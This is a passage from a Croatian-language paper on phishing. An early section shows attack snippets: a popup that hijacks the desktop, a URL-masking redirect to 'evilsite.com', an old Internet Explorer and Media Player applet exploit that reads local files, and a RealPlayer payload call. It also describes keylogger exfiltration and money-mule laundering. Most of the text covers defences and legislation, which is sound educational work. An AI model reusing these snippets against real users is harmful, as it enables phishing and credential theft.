U samo nekoliko HTML naredbi napadač može preoteti cijeli korisnikov desktop i postaviti lažno sučelje. Ovo se može postići pomoću naredbi window.createPopup() i popup.show(). Sljedeći primjer prikazuje dio takvog koda:

op=window.createPopup();

op.document.body.innerHTML=„...html...“;

op.show(0,0,screen.width,screen.height,document.body);

3.2.6 Motrenje korisničkih podataka

Key-loggeri i screen-grabberi mogu biti korišteni za motrenje povjerljivih korisničkih podataka unošenih unutar web aplikacije. Te se informacije pohranjuju lokalno i dostavljaju napadaču korištenjem nekih od sljedećih metoda:

· Konstantnim slanjem podataka. Kako bi to bilo moguće napadač mora cijelo vrijeme biti povezan s korisničkih računalom.

· Lokalno sakupljanje i grupiranje informacija i naknadno slanje napadačkom poslužitelju. Za slanje mogu se koristiti sljedeći protokoli: FTP, HTTP, SMTP...

· Sklupljanjem podataka kroz ‘‘stražni ulaz’‘. Posebni softver omogućava napadaču udaljeno povezivanje na korisničko računalo i preuzimanje podataka na zahtjev.

Key-logging

Namjena ovakvih programa je promatranje i snimanje pritisnutih tipki od strane korisnika posebno kad se od njega zahtjeva unos autentifikacijskih podataka. Napadač prikupljene podatke može kasnije iskoristiti za pristup tom istom sadržaju. Ovakvi programi mogu biti izvedeni tako da prikupljaju sve pritisnute tipke neovisno o aplikaciji ili sadržaju ili mogu prikupljati samo podatke upisane unutar web preglednika sa posebnim naslovima stranica.

Screen-grabbing

Neki sofisticiraniji napadi mogu koristiti metodu prikupljanja izgleda ekrana s podacima koji se unose u web aplikacije. Ova metoda je uspješna kod aplikacija koje sprečavaju mogućnost korištenja key-logging metode tako što se slova odabiru unutar drop-down liste. U većini slučajeva potrebno je prikupiti samo mali dio ekrana tako da su prikupljeni podaci maleni i brzo prenosivi. Sljedeći primjer prikazuje korištenje ovog napada.

3.6 Napad korištenjem screen-grabbing metode

3.2.7 Iskorištavanje ranjivosti klijentske strane

Sofisticiraniji web preglednici koje korisnici koriste za surfanje obično su ranjivi na jako puno napada. Što je više funkcionalnosti ugrađeno u preglednik to on pruža napadaču više mogućnosti napada. Kombinacija preglednika sa dodacima kao što su Flash, RealPlayer pružaju dodatne mogućnosti napada. Iako se proizvođači trude stalno zakrpavati propuste izbacivanjem stalnih update-ova, većina korisnika ih ne instalirava na svoja računala. Većina takvih napada ne može biti otkrivena i spriječena anti-virusnim alatima. Slijedi nekoliko primjera takvih napada:

Primjer 1: Loše rukovanje URL-om kod Microsoft Internet Explorer-a

Ubacivanjem znaka (u ovom primjeru 0x01 prikazanog escape sekvencom %01) unutar područja korisničkog imena u Login URL-u, korisnik će biti preusmjeren na napadački poslužitelj, a znakovi iza znaka %01 neće biti prikazani. Ova vrsta napada može biti iskorištena za maskiranje URL-a. Primjer HTML koda:

location.href=unescape('http://www.mybank.com%01@evilsite.com/phishing/fakepage.htm');

Primjer 2: Kombinacija Microsoft Internet Explorer-a i Windows Media Player-a

Ranjivost postoji unutar Microsoft Media Player-a koja može biti iskorištena pomoću java koda unutar Internet Explorer web preglednika. Ova ranjivost omogućava napadaču čitanje korisnikovih lokalnih datoteka i pokretanje programa. Izvršavanjem programa napadač može preuzeti kontrolu nad korisnikovim računalom. Problem se javlja unutar načina na koji Media Player skida i pohranjuje skinove. Primjerice sljedeći kod će skinuti datoteku wmp2.wmz i spremiti je u definiranu datoteku. Wmp2.wmz može biti java jar arhiva.

„C:/Program files/Windows Media Player/Skins/SKIN.WMZ“ : <IFRAME

SRC=„wmp2.wmz“></IFRAME>

Tada sljedeći applet tag izvršen sa codebase=‘‘file://c:/’‘imati će read only pristup disku c:\.

<APPLET CODEBASE=„file://c:/“ ARCHIVE=„Program files/Windows Media Player/SKINS/wmp2.wmz“

CODE=„gjavacodebase.class“ WIDTH=700 HEIGHT=300> <PARAM NAME=„URL“ VALUE=„file:///c:/test.txt“>

</APPLET>

Kako bi taj kod bio izvršen automatski, napadač mora natjerati korisnika da posjeti jednostavnu web stranicu:

function f()

{

window.open(„wmp7-bad.htm“);

}

setTimeout(„f()“,4000);

</SCRIPT>

koja poziva drugu HTML datoteku (wmp7-bad.htm):

<APPLET CODEBASE=„file://c:/“

ARCHIVE=„Program files/Windows Media Player/SKINS/wmp2.wmz“

CODE=„gjavacodebase.class“

WIDTH=700 HEIGHT=300>

</APPLET>

Primjer 3: Ranjivost RealPlayer dodataka web pregledniku

RealPlayer je najčešće korišten proizvod za dostavu Internet multimedijalnog sadržaja. Svi popularni web preglednici pružaju podršku za RealPlayer i automatsko pokretanje multimedije.

Oblikovanjem posebnih .RA, .RM, .RV ili .RMJ datoteka postoji mogućnost dovođenja do korumpiranje gomile koja može omogućiti pokretanje napadačevog koda. Posjećivanjem posebnih web stranica koje sadržavaju takve datoteke proizvoljni napadačev kod može biti izvršen na korisnikovom računalu. Slijedi primjer takvog koda:

<OBJECT ID=„RealOneActiveXObject“ WIDTH=0 HEIGHT=0 CLASSID=„CLSID:FDC7A535-4070-4B92-

A0EA-D9994BCC0DC5“></OBJECT>

// Play a clip and show new status display

function clipPlay() {

window.parent.external.PlayClip(„rtsp://evilsite.com/hackme.rm“, „Title=Glorious Day|Artist name=Me Alone“) }

4 Obrambeni mehanizmi [2]

4.1 Neutralizacija prijetnji

Kao što je prikazano u odjeljku 3 napadaču je na raspolaganju velik broj različitih napada stoga ni obrana od njih nije jednostavna. Ipak postoji mogućnost sprečavanja sadašnjih i budućih napada iskorištavanjem raspoloživih sigurnosnih tehnologija i tehnika. Za najbolju učinkovitost obrana se mora postaviti na tri različite razine:

· Klijentska strana – uključuje korisnikovo osobno računalo

· Poslužiteljska strana – uključuje Internet sustave na poslužiteljima

· Poslovni nivo – distribuirane tehnologije i upravljačke usluge treće strane

4.2 Klijentska strana

Klijentska strana predstavlja prvu stranu obrane. Zbog svoje distribuiranosti kućnih računala i različite educiranosti korisnika i svjesnosti problema sigurnost klijentske strane je mnogo lošija nego kod korporacijskih radnih stanica. Postoje mnoga rješenja koja se primjenjuju na obje strane.

Zaštita od phishinga na klijentskoj strani može biti ostvarena:

· Tehnologijama zaštite desktopa

· Korištenjem odgovarajućih manje sofisticiranih komunikacijskih postavki

· Korištenjem alata za nadgledanje rada aplikacija

· Digitalnim potpisivanjem e-maila

· Upoznatost sa sigurnosnim problemima

4.2.1 Zaštita radnog okruženja

Većina korisnika upoznata je sa lokalno instaliranim zaštitnim softverom, tipično u obliku nekog zaštitnog antivirusnog programa. Idealno desktop računala trebala bi koristiti višestruku zaštitu i biti u mogućnosti pružiti sljedeće usluge:

· Lokalnu antivirusnu zaštitu

· Osobnu zaštitnu stijenu

· Osobni anti spam filtar

· Softver za detekciju spyware-a

Na tržištu postoje rješenja koja obuhvaćaju jednu ili više spomenutih funkcionalnosti. Te funkcionalnosti trebala bi pružiti sljedeće:

· Mogućnost detekcije i prevenciju instalacije zlonamjernog softvera preko e-mail privitaka, dohvaćenih datoteka, dinamičkog HTML-a, skriptnog sadržaja.

· Mogućnost identifikacije spam e-mail poruka.

· Mogućnost dohvaćanja najnovijih antivirusnih i anti-spam potpisa. Ovaj proces trebao bi se obavljati svaki dan.

· Mogućnost detekcije i blokiranje neautoriziranih izlaznih konekcija od strane instaliranog softvera ili aktivnih procesa.

· Mogućnost detekcije nepravilnosti u mrežnom prometu. Npr. detekciju stvaranja ulazne HTTP konekcije i stvaranje izlazne HTTPS konekcije na nestandardnom portu.

· Mogućnost blokiranja ulaznih konekcija prema posebnim mrežnim portovima.

· Sprečavanje automatsko slanje povjerljivih informacija.

4.2.2 Sofisticiranost e-mail-a

Većina e-mail aplikacija koje koriste korporacijski korisnici i klijenti pružaju velik broj funkcionalnosti i sofisticiranosti. Dio tih funkcionalnosti može biti potreban za posebne korporacijske aplikacije i sustave, ali većina toga nije potrebna za svakodnevnu uporabu. Ta nepotrebno ugrađena, dodatna funkcionalnost iskorištava se za napade. Općenito popularne aplikacije daju mogućnost isključivanja dodatnih funkcionalnosti od strane korisnika. Slijede neke od tih funkcionalnosti.

E-mail temeljen na HTML-u

Velika većina spomenutih napada u odjeljku 3 omogućena je kroz e-mail temeljen na HTML-u. HTML funkcionalnost mora biti onemogućena u svim e-mail klijentskim aplikacijama. Umjesto toga treba postaviti čisti tekst (engl. plain text), a odabrani font trebao bi biti fiksiran na neki kao što je Courier. E-mail će tada biti preveden u čisti tekst sprečavajući većinu spomenutih napada.

Blokiranje privitaka unutar e-mail-a

Preporuča se korištenje aplikacija koje imaju mogu mogućnost blokiranja opasnih privitaka i koje automatski sprečavaju korisnika od njihovog otvaranja i pokretanja. Neke od poznatih aplikacija sadrže listu poznatih opasnih formata koji se mogu nalaziti u prilogu i na temelju nje sprečavaju korisnika od otvaranja takovih datoteka. Druge pak zahtijevaju od korisnika prethodno spremanje datoteke na neko mjesto prije njenog pokretanja. Nakon spremanja datoteke antivirusni alat ima bolju mogućnost pregledavanja datoteke u potrazi za virusom ili nekim zlonamjernim sadržajem. Korisnici ne bi trebali imati direktan pristup datoteci unutar e-mail aplikacije. To vrijedi za sve vrste privitaka (uključujući i Microsoft Word dokumente, multimedijalne datoteke i binarne datoteke) jer i one mogu sadržavati zlonamjerni kod.

4.2.3 Mogućnosti web preglednika

Web preglednik može biti korišten za obranu od napada ukoliko je ispravno konfiguriran. Slično kao e-mail aplikacije i web preglednici pružaju dodatne mogućnosti koje mogu biti iskorištene od napadača. Za većinu korisnika web preglednik je tehnički najsofisticiranija aplikacija koju koriste. Korisnici i tvrtke trebaju koristiti web preglednike odgovarajuće za njihove zadatke. Tako korisniku koji koristi preglednik samo za pregledavanje web stranica nije potreban sofisticirani preglednik koji nudi pregršt dodatnih mogućnosti. Kako bi se spriječilo većinu napada korisnik bi trebao poduzeti sljedeće:

· Onemogućiti sve popup funkcionalnosti

· Onemogućiti Java podršku

· Onemogućiti ActiveX podršku

· Onemogućiti pokretanje svih multimedijalnih datoteka

· Spriječiti pohranu nesigurnih kolačića

· Onemogućiti automatsko pokretanje skinutih datoteka unutar preglednika, umjesto toga datoteka bi trebala biti prethodno pohranjena na disk

Anti-phishing dodaci

Anti-phishing dodaci za web preglednike omogućavaju aktivno promatranje web stranica koje korisnik posjećuje i sprečavaju napade. Takvi dodaci uobičajeno provjeravaju posječen dali zahtijevani URL dolazi od registriranog poslužitelja ili se nalazi na računalu poznatom po phishing napadima.

Slika 4.1 Anti-phishing dodatak za Microsoft Internet Explorer

4.2.4 Digitalno potpisani e-mail

Postoji mogućnost korištenja kriptografskih sustava za digitalno potpisivanje e-mail poruka. To se može koristiti za provjeru integriteta sadržaja e-mail poruke odnosno detekciju promjene sadržaja tijekom njenog prijenosa. Gotovo svi popularni e-mail klijenti podržavaju digitalno potpisivanje i provjeru potpisanih e-mail poruka. Preporuča se:

· Stvaranje osobnog javnog i privatnog para ključeva

· Postavljanje javnog ključa uglednom poslužitelju koji se bavi upravljanjem ključevima tako da korisnici koji prime potpisani mail mogu provjeriti njegov integritet.

· Omogućiti automatsko potpisivanje e-mail poruka.

· Provjeravanje svih primljenih potpisanih e-mail poruka i pažljivo rukovanje s nepotpisanim.

Slika 4.2 Digitalno potpisana e-mail poruka

Potpisana e-mail poruka je privatnim ključem potpisana hash vrijednost koja uzima u obzir poruku, njenu duljinu, datum i vrijeme. Primatelj koristeći javni ključ pošiljatelja provjerava valjanost primljene poruke. Važno je spomenuti da ne postoji ograničenje na kreiranje para ključeva za neku e-mail adresu i osobu tako da i napadač može kreirati par ključeva i digitalno potpisati e-mail poruku.

S/MIME i PGP

Postoje dvoje popularne metode za digitalno potpisivanje. To su S/MIME i PGP (uključujući PGP/MIME i noviji OpenPGP standard). Većina značajnih e-mail aplikacija u mogućnosti je koristiti i razumijevati S/MIME, PGP/MIME, i OpenPGP potpisane e-mail poruke. Iako pružaju slične usluge ove dvoje metode imaju vrlo različite formate. Također imaju različite formate svojih certifikata. To dovodi do toga da ne samo da korisnici koji koriste različite protokole ne mogu komunicirati nego ne mogu niti dijeliti autentifikacijske certifikate.

Neka svojstva S/MIME i PGP-a:

· S/MIME je originalno kreiran od strane ‘‘RSA Data Security, Inc’‘. Baziran je na PKCS#7 podatkovnom formatu i X.509v3 formatu za certifikate. PKCS#7 je baziran na ASN.1 DER formatu za podatke.

· PGP/MIME baziran je na PGP koji je kreiran od strane više pojedinaca združenih zajedno u ‘‘PGP, Inc’‘. Podatkovni format i format certifikata koristi binarno kodiranje. OpenPGP je također baziran na PGP-u.

· S/MIME, PGP/MIME i OpenPGP koriste MIME za izgradnju svojih poruka. Oslanjaju se na višedijelni/potpisani MIME tip opisan u RFC 1847 za slanje potpisanih poruka preko Interneta.

4.2.5 Opreznost korisnika

Korisnici mogu poduzeti nekoliko koraka kako bi izbjegli postajanje žrtvama phishing napada koji uključuju pregledavanje dobivenog sadržaja i ispitivanje njegove autentičnosti.

Općenita opreznost uključuje:

· Ukoliko primite e-mail koji vas upozorava da će vaš račun biti zatvoren ukoliko ne potvrdite njegove podatke, ne odgovarajte na njega niti ne klikati na linkove unutar e-mail poruke. Umjesto toga kontaktirajte kompaniju u e-mailu koristeći telefon ili adresu web stranice za koju znate da je ispravna.

· Nikad ne odgovarajte na HTML e-mail poruke koje sadržavaju forme. Svi podaci koji se šalju e-mailom (čak i da je on legitiman), šalju se u obliku čistog teksta i mogu biti motreni.

· Izbjegavajte slanje osobnih i financijskih podataka e-mailom. Prije nego šaljete takve podatke kroz web stranicu provjerite dali preglednik prikazuje oznaku lokota u statusnoj traci.

· Za stranice koje pokazuju da su sigurne provjerite SSL certifikat.

Pranje novca

Nakon uspješno ukradenih podataka pecači su morali obaviti siguran način prijenosa ukradenog novca s računa u zemlji. Popularna metoda za to je putem lažnih poslova. Napadač ukrade novac s velikog broja bankovnih računa pomoću standardnih phishing napada. Tada dolazi do problema dobivanja tog novca pošto većina Internet banaka ne dozvoljava direktan prijenos novaca s računa u prekomorsku zemlju. Rješenje te zabrane je pomoću poslova pranja novca. Pecači nude taj posao u spam porukama, lažnim oglasima za posao na postojećim web stranicama ili nekim drugim putem. Nakon što pronađu osobu koja će obaviti traženi posao, upute je da kreira novi bankovni račun u banci u kojoj je napadač ukrao novac. Napadač tada ukradeni novac prebacuje s ostalih računa na taj. Zatim zahtjeva od te osobe da prebaci novac uz odgovarajuću proviziju. Napadač sada posjeduje većinu ukradenog novca s originalnih računa. Sva odgovornost za prijenos novca prebačena je na osobu koja obavlja taj posao.

Slika 4.3 Primjer oglasa za pranje novca

4.3 Poslužiteljska strana

Implementacijom inteligentnih tehnika za borbu protiv phishing napada unutar svojih web aplikacija moguće je zaštititi korisnika od budućih napada. Sprečavanjem napada na poslužiteljskoj strani organizacije mogu poduzeti velike korake za borbu protiv phishinga. Na poslužiteljskoj strani zaštita protiv napada može biti poduzeta s:

· Povećanjem upoznatosti korisnika

· Pružanjem validacije u službenim komunikacijama

· Osiguravanjem sigurnog dizajna web aplikacija

· Korištenjem autentifikacijskih sustava baziranih na tokenu

· Rukovanje URL-om

4.3.1 Upoznatost korisnika

Važno je da organizacije konstantno informiraju svoje korisnike o opasnostima od phishing napada i o preventivnim akcijama. Korisnici moraju biti upoznati o načinu na koji organizacija komunicira sigurno s njima. Primjerice, slanjem sljedeće poruke korisnici će moć prepoznati lažne poruke koje se šalju u ime te organizacije.

„MyBank will never initiate a request for sensitive information from you via e-mail (i.e., Social Security Number, Personal ID, Password, PIN or account number). If you receive an e-mail that requests this type of sensitive information, you should be suspicious of it. We strongly suggest that you do not share your Personal ID,

Password, PIN or account number with anyone, under any circumstances. If you suspect that you have received a fraudulent e-mail, or wish to validate an official e-mail from MyBank, please visit our anti-phishing page

http://mybank.com/antiphishing.aspx“

Važni koraci kako bi se postigla upoznatost korisnika o mogućim napadima:

· Stalnim podsjećanjem korisnika. To se može postići malim oznakama na login stranicama o načinu na koji organizacija komunicira s njima.

· Pružanjem jednostavnog načina prijave pokušaja prijevare i slanja lažnih poruka u ime te organizacije.

· Davanjem savjeta o načinu verifikacije integriteta web stranice koju koriste. To uključuje na koji način da provjere sigurnosne postavke web preglednika, provjeru SSL konekcije, pregledavanje lokota i certifikata web stranice, prepoznavanjem URL-a u web pregledniku.

· Slanjem jasnih, sažetih i dosljednih e-mail poruka svojim korisnicima.

· Brzim reakcijama na nove identificirane phishing napade.

4.3.2 Validacija u službenim komunikacijama

Borba protiv napada može biti ostvarena provjerom službene komunikacije s korisnikom i detekciju potencijalnih phishing napada. Postoji nekoliko tehnika kojima se to može potiči.

Personalizacija e-mail poruka

E-mail poruke poslane korisnicima trebaju biti što osobnije. Personalizacija uključuje korištenje osobnog imena korisnika kojem se šalje poruka ili pozivanje na neku dijeljenu informaciju specifičnu za tog korisnika. Primjerice:

· ‘‘Gospodine Smith ’‘ umjesto ‘‘Gospodine’‘ ili umjesto ‘‘Cijenjeni gospodine’‘

· Spominjanjem korisničkog bankovnog računa ‘‘**** **** **35 4896’‘ (prikazan je samo dio povjerljivih informacija)

Organizacije ne smiju slati ostale povjerljive informacije o korisniku (adresu, lozinku, korisničko ime i sl.)

Pozivanje na prethodno poslane e-mail poruke

Prilikom slanje e-mail poruke organizacija se može pozivati na prethodno poslane poruke. To se može postići na nekoliko načina:

· Pozivanjem na temu i datum slanja prethodne e-mail poruke.

· Davanjem slijednih brojeva svakoj poslanoj e-mail poruci.

Iako su spomenute metode korisne one u nekim slučajevima mogu otežavati provjeru valjanosti e-mail poruke. Primjerice ukoliko korisnik nema pristup do prethodno primljenog e-mail-a.

Digitalnim potpisivanjem e-mail poruka

Preporuča se korištenje digitalno potpisanih e-mail poruka. Korisnike treba educirati o načinu na koji mogu provjeriti ispravnost takovih poruka.

Postojanjem web stranica za validaciju primljenih e-mail poruka

Postojanje stranice na koju korisnik može prekopirati sadržaj primljene e-mail poruke može pomoći otkrivanju novih prijetnji i spriječiti napade. Slično može se postaviti stranica na koju korisnik može prekopirati sumnjiv URL i provjeriti njegovu valjanost.

Zvučna ili vizualna personalizacija e-mail poruke

Postoji mogućnost ubacivanja zvučnih ili vizualnih sadržaja u e-mail poruke. Sadržaj koji se ubacuje treba biti individualan za svakog korisnika i poznat samo njemu.

4.3.3 Sigurnost web aplikacija

Korištenjem robusnih funkcija i implementacijom nekoliko sigurnosnih dodataka velik broj napada može biti spriječen.

Provjera sadržaja

Jedan on najčešćih sigurnosnih nedostataka je loša implementacija provjere ulaznog sadržaja. Ključna pravila za uspješnu implementaciju procesa provjere sadržaja uključuje:

· Nikad ne vjerovati sadržaju unesenom od strane korisnika ili nekog drugog djela aplikacije.

· Uvijek obraditi podatke prije njihovog procesiranja ili spremanja.

· Osigurati da su svi opasni znakovi zamijenjeni sa svojim odgovarajućim HTML sigurnim zamjenama. Primjerice znak ‘‘<’‘ ima svoje posebno značenje u HTML-u i treba bi biti zamijenjen sa &lt.

· Osigurati obradu svih podataka tako da se kodirani znakovi (npr. %2E) prevedu u svoje izvorne znakove.

rukovanje sjednicom

Za neutralizaciju ove vrsta napada, osobe koje razvijaju aplikaciju trebale bi pripaziti na sljedeće:

· Nikad ne prihvaćati informacije o sjednici unutar URL-a.

· Osigurati da SessionID ima vremenski rok nakon kojeg više nije upotrebljiv i njegovu prethodnu provjeru za svaki zahtjev klijenta.

· Osigurati da aplikacija posjeduje mogućnost otkazivanja SessionID-a i izbjegavati njegovo isto pojavljivanje neko određeno vrijeme.

· Svako predstavljanje pogrešnog SessionID-a aplikaciji treba preusmjeriti korisnika na stranicu za ponovan login i dodijeliti mu novi SessionID-a.

· Uvijek generirati novi SessionID nakon što se konekcija prebaci s inicijalne HTTP na sigurnu HTTPS.

Ograničenja na URL

Za web aplikacije koje koriste preusmjeravanje korisnika na druge lokacije ili računala veliku pažnju treba posvetiti oblikovanju URL-a. Nekoliko bitnih stvari koje valja imati na umu:

· Nikad ne referencirati preusmjereni URL direktno unutar staze web preglednika (npr. http://mybank.com/redirect.aspx?URL=secure.mybank.com).

· Koristiti uvijek puno ime domene. Ne koristiti IP adresu unutar URL-a.

· Ne dozvoliti da korisnik navodi svoj URL.

Proces autentifikacije

Za mnoge napadače glavni je cilj hvatanje korisničkih podataka za autentifikaciju. Kako bi to postigao napadač mora biti u mogućnosti promatrati sve podatke koje korisnik predaje tokom autentifikacije. Organizacije mogu koristiti više metoda kako bi hvatanje tih podataka otežale. Osobe koje razvijaju takve aplikacije trebaju:

· Osigurati korištenje login procesa u dvoje faze (minimalno). Korisniku se prvo prezentira login stranica na koju mora unijeti detalje o računu (npr. korisničko ime i broj kreditne kartice). Nakon uspješnog unosa korisniku se prezentira nova stranica koja zahtjeva dva ili više jedinstvenih autentifikacijskih podataka.

· Spriječiti mogućnost key-logging napada tako što se korisniku ponudi odabir slova koja treba unijeti iz lista. Korisnik unosi slovo klikom miša na neko od ponuđenih.

· Koristiti sadržaj stranice poseban za tog korisnika. Primjerice korisniku se može kod registriranja dodijeliti neki grafički element koji se pokazuje svaki puta kad se taj isti korisnik želi autentificirati.

· Ne komplicirati previše proces autentifikacije. Neki korisnici imaju ograničene mogućnosti.

4.3.4 Korištenjem autentifikacijskih sustava baziranih na tokenu

Postoji nekoliko metoda autentifikacije koje koriste vanjske sustave za generiranje lozinki za jednokratnu uporabu. Takvi sustavi bazirani su na fizičkom uređaju. Njihova namjena je generiranje jednokratnih lozinki koje mogu biti korištene u procesu autentifikacije samo jedanput. Uređaji koji se koriste u takove svrhe izgledaju slično pametnim karticama ili kalkulatoru.

Slika 4.4 Autentifikacija bazirana na tokenu

Ovaj tip autentifikacije koristi se kod transakcijskih web aplikacija kod kojih je potrebna velika sigurnost, primjerice bankovnih.

4.3.5 Rukovanje URL-om

Velik broj napada iskorištava zbunjenost korisnika uzrokovanu korištenjem složenih imena organizacijskih računala i kompliciranih URL-ova. Većina korisnika je slabo tehnički obrazovana i lako ih je prevariti podmetanjem lažnih kompliciranih linkova. Ukoliko je moguće organizacije bi trebale poduzeti sljedeće:

· Uvijek koristiti istu korijensku domenu. Primjerice:

http://www.mybank.com/ebank umjesto http://www.mybank-ebank.com

http://www.mybank.com/UK umjesto http://uk.mybank.com

https://secure.mybank.com umjesto https://www.secure-mybank.com

· Automatski preusmjeriti regionalne i druge registrirane domene prema jednoj glavnoj domeni. Primjerice:

http://www.mybank.co.uk preusmjeriti prema http://www.mybank.com/UK

https://secure.mybank.com.au preusmjeriti prema https://secure.mybank.com/AU

http://www.mybank-investor.de preusmjeriti prema http://www.mybank.com/DE/Investor

· Koristiti imena poslužitelja koja označavaju web aplikacije. Primjerice:

https://secure.mybank.com umjesto https://www.mybank.com

http://invest.mybank.com umjesto http://www.InvestorAtMyBank.com

· Korištenjem što jednostavnijih imena poslužitelja i što jednostavnijih URL-ova. Primjerice:

https://secure.mybank.com umjesto https://www.mybank.com/secureinvestor

http://news.mybank.com/UK umjesto http://www.mybank.co.uk/onlinebanking/changes/news

· Korištenjem prevođenja adresa i ‘‘load balancing’‘ tehnologija za izbjegavanje numeriranih računala. Primjerice:

http://www.mybank.com umjesto http://www3.mybank.com

· Izbacivanjem sjedničkih informacija iz URL-a. Ne preporuča se korištenje URL-a sljedećeg oblika:

http://www.mybank.com/ebanking/transfers/doit.aspx?funds=34000&agent=kelly02&sessionid=8989 39289834

4.4 Poslovni nivo

Ovo poglavlje opisuje korake koje trebaju poduzeti tvrtke za borbu protiv phishinga kako bi zaštitile svoje klijente i zaposlenike od napada. Zaštita na poslovnom nivou uzima u obzir zaštitu klijentske i poslužiteljske strane. Važni koraci zaštite uključuju:

· Autentifikacija poslužitelja e-mail pošte.

· Digitalno potpisivanje e-mail pošte.

· Motrenje domena.

· Gateway usluge.

· Upravljane usluge.

4.4.1 Autentifikacija poslužitelja e-mail pošte

Nekoliko metoda predloženo je za autentifikaciju poslužitelja e-mail pošte. U suštini pošiljateljev e-mail poslužitelj provjerava se od strane primajućeg e-mail poslužitelja. Ako pošiljateljeva IP adresa nije u skupu autoriziranih adresa za odgovarajuću e-mail domenu, e-mail poruka se odbacuje od strane primajućeg e-mail poslužitelja.

Slika 4.5 Autentifikacija poslužitelja e-mail pošte DNS ispitivanjem MX zapisa

Alternativno korištenjem Secure SMTP protokola, prijenos e-maila može biti proveden preko kriptiranog SSL/TLS linka. Kada se pošiljateljev e-mail poslužitelj spoji na primateljev, razmjenjuju se certifikati i uspostavlja kriptiranu veza između njih. Nedostatak certifikata ili korištenje neodgovarajućeg onemogućava uspostavu sigurneveze i slanje e-mail poruka.

Slika 4.6 Autentifikacija poslužitelja e-mail pošte korištenjem certifikata

Namjena provjeravanja pošiljateljevog e-mail poslužitelja je sprečavanje slanja spam poruka. Također primatelj e-mail poruke zna da je pristigla poruka od valjanog izvora jer je prethodno proveden postupak autentifikacije.

4.4.2 Digitalno potpisivanje e-mail pošte

Proširivanjem procesa digitalnog potpisivanja spomenutog u prethodnim poglavljima, organizacije mogu konfigurirati svoje primajuće e-mail poslužitelje da automatski provjeravaju digitalno potpisane e-mail poruke prije nego stignu do primatelja. Ovaj proces je mnogo učinkovitiji za poslovne organizacije. Dodatno se poslužitelji mogu konfigurirati tako da automatski potpisuju sve odlazne e-mail poruke.

Slika 4.7 Provjera digitalno potpisanih e-mail poruka

4.4.3 Motrenje domena

Važno je da organizacije pažljivo promatraju registracije Internet domena povezanih s njihovom organizacijom. Organizacije bi trebale konstantno motriti registar Internet domena u potrazi za domenama koje narušavaju njihovo zaštićeno ime i mogu biti iskorištene za postavljanje krivotvorenih web stranica varajući pritom njihove korisnike. Treba obratiti pozornost na sljedeća dva područja:

· Istek i obnovu postojećih korporacijskih domena

· Registraciju sličnih imena domena

Istek i obnova domena

Postoji velik broj agencija koje dozvoljavaju ponovnu registraciju domena koje su bile u vlasništvu nekih organizacija i nisu obnovljene. Pošto organizacije obično koriste nekoliko domena veliku brigu treba posvetiti njihovom održavanju i uplatama za njihovo očuvanje. Domene koje organizacije ne očuvaju mogu biti kupljene od nekog drugog.

Registriranje sličnih imena domena

Registracija domene u registru domena jednostavan je proces i bože biti obavljan bilo gdje u svijetu. Postoji velik broj mogućnosti da neko registrira domenu koja može narušavati sigurnost organizacije. Takove vrlo slične domene mogu biti korištene za prevaru korisnika. Pretpostavimo da postoji organizacija imena ‘‘Global Widgets’‘. Njihova web stranica bi izgledala www.globalwidgets.com. Organizacija bi trebala obratiti pozornost na registraciju sljedećih domena:

· Domenu odvojenu crticom – www.global-widgets.com

· Domenu koja se odnosi na posebnu državu – www.globalwidgets.com.au

· Domenu sa zamijenjenim riječima – www.widgetsglobal.com

· Domenu koja sadržava veliko slovo ‘‘i’‘ umjesto malog slova ‘‘L’‘ – www. gIobaIwidgets.com

Postoji nekoliko komercijalnih usluga koje mogu pomoči organizaciji u detekciji registracije opasnih domena i obavijestiti ih o tome.

4.4.4 Gateway usluge

Poduzeća su idealno mjesto za postavljanje gateway zaštitnih usluga koje mogu motriti i kontrolirati ulaznu i izlaznu komunikaciju. Te usluge mogu biti korištene za detekciju zlonamjernog sadržaja unutar e-mail poruka ili nekih drugih komunikacijskih sustava. Tipična gateway usluga uključuje:

· Antivirusno skeniranje – korisno za detekciju virusa, zlonamjernog skriptnog koda i e-mail privitaka koji sadržavaju zlonamjeran softver.

· Anti-spam filtar – pregledavanje sadržaja e-mail poruka bazirano na pravilima može spriječiti mnoge oblike phishing napada.

· Filtriranje sadržaja – pregledavanje mnogih oblika komunikacijskih metoda i protokola (npr. IM, AOL, HTTP, FTP, e-mail) u potrazi za zlim sadržajem. Jednostavnu zaštitu od posjete poznatih opasnih web stranica.

· Proxy uslugama – zaštita od ulaznih napada korištenjem prevođenja mrežnih adresa. Dobra zaštita protiv curenja informacija.

4.4.5 Upravljane usluge

Iako periferijski zaštitni sustavi pružaju dobru zaštitu protiv mnogih napada, pecači konstantno razvijaju nove metode kako bi zaobišli postavljene zaštitne mehanizme. Upravljene usluge u domeni anti-spam i antiphishing zaštite pružaju dragocjena poboljšanja sigurnosti. Posjeduju mogućnost analize dostavljenih e-mail poruka na globalnom nivou i identifikaciju zlonamjernih poruka. Primjerice, organizacija može primiti nekoliko pažljivo prikrivenih phishing e-mailova sa zanemarivim promjenama koje ne prepoznaju anti-spam filtri dok pružatelji upravljanih usluga uočavaju nekoliko stotina takovih poruka. Količina predstavlja ključnu komponentu u identifikaciji zlonamjernog sadržaja.

5 Zakonodavstvo

Phishing zbog lažnih i neovlaštenih izjava radi zavaravanja osoba da otkriju svoje osobne podatke krši nekoliko postojećih saveznih zakona u Americi. Krađa identiteta, prijevara kreditnim karticama, bankovna prijevara i računalna prijevara su već zabranjene različitim saveznim i državnim zakonima. Ipak praćenje i progonjenje prekršitelja je prilično teško zbog nejasnoće koja je vladina agencija odgovorna za to. Posljednjih godina savezna i državna zakonodavna tijela počela su provoditi zakone koje se odnose na online krađu identiteta. Nakon velikog napora za borbu protiv neželjene pošte i krađe identiteta donesen je Anti-Phishing akt. Namjena tog akta je definiranje propisivanje minimalne presude i kazne za specifična nedjela.

5.1 CAN-SPAM akt [6]

